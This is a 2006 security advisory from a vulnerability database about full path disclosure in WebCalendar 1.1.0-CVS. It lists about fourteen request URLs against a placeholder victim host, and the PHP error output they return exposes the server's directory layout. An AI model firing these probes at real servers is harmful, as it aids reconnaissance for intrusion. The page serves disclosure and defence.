Full path disclosure in Webcalendar 1.1.0-CVS

2006.03.29
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Full path disclosure in webcalendar Author : Rusydi Hasan M a.k.a : cR45H3R Location : Indonesia, Cilacap Date : March,28th 2006 Version : 1.1.0-CVS --- (software description) WebCalendar is a PHP application used to maintain a calendar for one or more persons and for a variety of purposes. --- (vulnerable) an attacker can get the location of the root directory from error message --- (PoC) 1. in directory /includes/index.php http://[victim]/[webcal_dir]/includes Parse error: parse error, unexpected T_STRING in /var/www/html/webcalendar/includes/index.php on line 1 2 in directory /tests/add_duration_test.php and /tests/all_tests.php http://[victim]/[webcal_dir]/tests/add_duration_test.php Fatal error: Class testoffunctions: Cannot inherit from undefined class unittestcase in /var/www/html/webcalendar/tests/add_duration_test.php on line 4 http://[victim]/[webcal_dir]/tests/all_tests.php Warning: main(../../simpletest/unit_tester.php): failed to open stream: No such file or directory in /var/www/html/webcalendar/tests/all_tests.php on line 6 Fatal error: main(): Failed opening required '../../simpletest/unit_tester.php' (include_path='.:/usr/lib/php/:/usr/share/pear/') in /var/www/html/webcalendar/tests/all_tests.php on line 6 3 in groups.php http://[victim]/[webcal_dir]/groups.php Fatal error: Call to undefined function: translate() in /var/www/html/webcalendar/groups.php on line 5 4 in nonusers.php http://[victim]/[webcal_dir]/nonusers.php Fatal error: Call to undefined function: translate() in /var/www/html/webcalendar/nonusers.php on line 3 5 in /includes/settings.php http://[victim]/[webcal_dir]/includes/settings.php Parse error: parse error, unexpected ':' in /var/www/html/webcalendar/includes/settings.php on line 3 6 in /includes/init.php http://[victim]/[webcal_dir]/includes/init.php Warning: main(includes/classes/WebCalendar.class): failed to open stream: No such file or directory in /var/www/html/webcalendar/includes/init.php on line 46 Fatal error: main(): Failed opening required 'includes/classes/WebCalendar.class' (include_path='.:/usr/lib/php/:/usr/share/pear/') in /var/www/html/webcalendar/includes/init.php on line 46 7 in /includes/settings.php.orig http://[victim]/[webcal_dir]/includes/settings.php.orig Parse error: parse error, unexpected ':' in /var/www/html/webcalendar/includes/settings.php.orig on line 21 8 in /includes/js/admin.php http://[victim]/[webcal_dir]/includes/js/admin.php Fatal error: Call to undefined function: etranslate() in /var/www/html/webcalendar/includes/js/admin.php on line 14 9 in /includes/js/edit_entry.php http://[victim]/[webcal_dir]/includes/js/edit_entry.php Fatal error: Call to undefined function: etranslate() in /var/www/html/webcalendar/includes/js/edit_entry.php on line 15 10 in /includes/js/edit_layer.php http://[victim]/[webcal_dir]/includes/js/edit_layer.php Fatal error: Call to undefined function: etranslate() in /var/www/html/webcalendar/includes/js/edit_layer.php on line 24 11 in /includes/js/export_import.php http://[victim]/[webcal_dir]/includes/js/export_import.php Fatal error: Call to undefined function: etranslate() in /var/www/html/webcalendar/includes/js/export_import.php on line 68 12 in /includes/js/popups.php http://[victim]/[webcal_dir]/includes/js/popups.php // You can copy/modify and distribute this code under the conditions // of the GNU GENERAL PUBLIC LICENSE Version 2. // var ns4 // Are we using Netscape4? var ie4 // Are we using Internet Explorer Version 4? var ie5 // Are we using Internet Explorer Version 5 and up? var kon // Are we using KDE Konqueror? var x,y,winW,winH // Current help position and main window size var idiv=null // Pointer to infodiv container var px="px" // position suffix with "px" in some cases var popupW // width of popup var popupH // height of popup var xoffset = 8 // popup distance from cursor x coordinate var yoffset = 12 // popup distance from cursor y coordinate var followMe = 1 // allow popup to follow cursor...turn off for better performance var maxwidth = 300 // maximum width of popup window function nsfix(){setTimeout("window.onresize = rebrowse", 2000);} function rebrowse(){window.location.reload();} function infoinit(){ ns4=(document.layers)?true:false, ie4=(document.all)?true:false; ie5=((ie4)&&((navigator.userAgent.indexOf('MSIE 5')>0)||(navigator.userAgent.indexOf('MSIE 6')>0)))?true:false; kon=(navigator.userAgent.indexOf('konqueror')>0)?true:false; x=0;y=0;winW=800;winH=600; idiv=null; if (followMe) { document.onmousemove = mousemove; if(ns4&&document.captureEvents) document.captureEvents(Event.MOUSEMOVE); } // Workaround for just another netscape bug: Fix browser confusion on resize // obviously conqueror has a similar problem :-( if(ns4||kon){ nsfix() } if(ns4) { px=""; } var entries = document.getElementsBySelector("a.entry"); entries = entries.concat(document.getElementsBySelector("a.layerentry")); entries = entries.concat(document.getElementsBySelector("a.unapprovedentry")); for (var i = 0; i < entries.length; i++) { entries[i].onmouseover = function(event) { show(event, "eventinfo-" + this.id); window.status = " Fatal error: Call to undefined function: etranslate() in /var/www/html/webcalendar/includes/js/popups.php on line 57 ^ ^ |---------- the directory 13 in /includes/js/pref.php http://[victim]/[webcal_dir]/includes/js/pref.php 0 ) colorErr = true; if ( ! validWorkHours ( form ) ) { err += " Fatal error: Call to undefined function: etranslate() in /var/www/html/webcalendar/includes/js/pref.php on line 29 14 in /includes/menu/index.php http://[victim]/[webcal_dir]/includes/menu Fatal error: Call to undefined function: access_is_enabled() in /var/www/html/webcalendar/includes/menu/index.php on line 24 --- (shoutz) #k-elektronik (fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,etc) #e-c-h-o (y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous, the day) Ph03n1x,ghoz,r34d3r,spyoff,slackX,sakitjiwa,xnuxer k-elektronik (at) googlegroups (dot) com [email concealed] newbie_hacker (at) yahoogroups (dot) com [email concealed] jasakom-perjuangan (at) yahoogroups (dot) com [email concealed] --- (special) danurdara prama for the bandwidth B) --- (contact) cR45H3R || http://www.kecoak.or.id || crasher (at) kecoak.or (dot) id [email concealed]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top